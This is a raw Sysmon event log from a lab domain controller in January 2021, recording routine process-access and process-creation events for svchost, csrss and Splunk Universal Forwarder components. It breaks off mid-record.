10341000x80000000000000009146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.233{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46EF-6000-F304-000000009A01}2828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.233{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46EF-6000-F304-000000009A01}2828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.234{08A6967A-46EF-6000-F304-000000009A01}2828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.577{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46F0-6000-F504-000000009A01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.577{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.577{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.577{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.577{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.577{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.577{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.577{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.577{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.577{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.577{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46F0-6000-F504-000000009A01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.577{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46F0-6000-F504-000000009A01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.578{08A6967A-46F0-6000-F504-000000009A01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:16.046{08A6967A-46EF-6000-F404-000000009A01}50725036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.624{08A6967A-46F1-6000-F604-000000009A01}50045104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 